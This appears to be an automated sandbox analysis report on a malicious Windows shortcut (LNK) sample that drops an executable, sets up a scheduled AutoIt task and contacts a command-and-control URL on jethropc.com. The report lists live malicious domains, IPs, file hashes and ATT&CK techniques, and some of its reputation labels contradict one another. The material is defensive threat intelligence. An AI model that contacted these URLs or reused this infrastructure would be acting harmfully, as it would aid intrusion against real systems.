Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00007FF7F1DEBAFC

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	8_2_00007FF7F1DDF964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	8_2_00007FF7F1DB2B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0070 calloc,calloc,calloc,bind,WSAGetLastError,	8_2_00007FF7F1DD0070
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	12_2_00007FF700E8F964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E62B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	12_2_00007FF700E62B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80070 calloc,calloc,calloc,bind,WSAGetLastError,	12_2_00007FF700E80070

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	312 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	21 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Native API	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
knfV5IVjEV.lnk	21%	ReversingLabs	Win32.Trojan.Pantera
knfV5IVjEV.lnk	30%	Virustotal		Browse
knfV5IVjEV.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\GSlLzFnTov\GSlLzFnTov.exe	0%	ReversingLabs
C:\GSlLzFnTov\GSlLzFnTov.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
jethropc.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com	0%	Avira URL Cloud	safe
https://curl.se/libcurl/c/curl_easy_setopt.html	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.html	0%	Avira URL Cloud	safe
http://www.microsoft.co	1%	Virustotal		Browse
https://curl.se/docs/sslcerts.htmlcurl	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.htmlD	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T	0%	Avira URL Cloud	safe
https://curl.se/libcurl/c/curl_easy_setopt.html	0%	Virustotal		Browse
https://curl.se/docs/sslcerts.htmlcurl	0%	Virustotal		Browse
https://curl.se/	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.html	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Virustotal		Browse
https://curl.se/docs/copyright.html	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Avira URL Cloud	safe
https://curl.se/	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2	0%	Avira URL Cloud	safe
https://curl.se/P	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Virustotal		Browse
https://curl.se/docs/http-cookies.html#	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.htmlD	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.html	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html#	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=	0%	Avira URL Cloud	safe
https://curl.se/P	0%	Virustotal		Browse
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y	0%	Avira URL Cloud	safe
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jethropc.com	162.241.216.65	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	false	Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com	GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/libcurl/c/curl_easy_setopt.html	GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz	GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://curl.se/docs/http-cookies.html	GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_	GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e	GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##	GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/sslcerts.html	GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/sslcerts.htmlcurl	GSlLzFnTov.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html	GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.htmlD	GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T	GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/	GSlLzFnTov.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz	GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.html	GSlLzFnTov.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html#	GSlLzFnTov.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O	GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%	GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2	GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/P	GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html#	GSlLzFnTov.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu	GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago	knfV5IVjEV.lnk	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=	powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y	GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.216.65	jethropc.com	United States		46606	UNIFIEDLAYER-AS-1US	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430699
Start date and time:	2024-04-24 03:01:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	knfV5IVjEV.lnk (renamed file extension from none to lnk, renamed because original name is a hash value)
Original Sample Name:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Detection:	MAL
Classification:	mal100.rans.evad.winLNK@25/11@1/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 65 Number of non-executed functions: 231

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
03:02:10	API Interceptor	15x Sleep call for process: powershell.exe modified
03:02:26	Task Scheduler	Run new task: QwbpjvdmTA path: c:\GSlLzFnTov\AutoIt3.exe s>c:\GSlLzFnTov\QwbpjvdmTA.au3

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	http://www.noahsarkademy.com	Get hash	malicious	Unknown	Browse	69.49.230.31
	CR-FEDEX_TN-775720741041.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	162.144.15.164
	DHL_RF_20200712_BN_OTN 0095673441.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370	Get hash	malicious	Unknown	Browse	162.241.225.201
	DHL INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse	192.185.171.184
	PO No. 2430800015.exe	Get hash	malicious	AgentTesla	Browse	162.241.225.141
	DHL_RF_20200712_BN_N0095673441.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	CR-FEDEX_TN-775537409198_Doc.vbs	Get hash	malicious	Unknown	Browse	192.185.84.89
	http://vgjlx.app.link/e/0ZWlI0Ci1Ib	Get hash	malicious	Unknown	Browse	162.241.225.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe	Get hash	malicious	Python Stealer	Browse	162.241.216.65
	23-April-24-ACH-7fa67756.jar	Get hash	malicious	Unknown	Browse	162.241.216.65
	23-April-24-ACH-7fa67756.jar	Get hash	malicious	Unknown	Browse	162.241.216.65
	New Soft Update.exe	Get hash	malicious	Unknown	Browse	162.241.216.65
	u2.bat	Get hash	malicious	Bazar Loader, Qbot	Browse	162.241.216.65
	SecuriteInfo.com.Python.Stealer.1447.10844.3562.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	162.241.216.65
	4PPlLk8IT5.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	162.241.216.65
	SecuriteInfo.com.Trojan.GenericKD.72333858.1744.9991.exe	Get hash	malicious	Unknown	Browse	162.241.216.65
	pRcbxPdooL.exe	Get hash	malicious	Unknown	Browse	162.241.216.65
	Payslip-9583.exe	Get hash	malicious	Unknown	Browse	162.241.216.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\GSlLzFnTov\GSlLzFnTov.exe	J-JeremieKarg-78462.js	Get hash	malicious	Unknown	Browse
	J-JeremieKarg-78462.js	Get hash	malicious	Unknown	Browse
	5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs	Get hash	malicious	DarkGate	Browse
	6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbs	Get hash	malicious	DarkGate	Browse
	Efz.vbs	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\GSlLzFnTov\GSlLzFnTov.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	530944
Entropy (8bit):	6.426002179912066
Encrypted:	false
SSDEEP:	12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
MD5:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
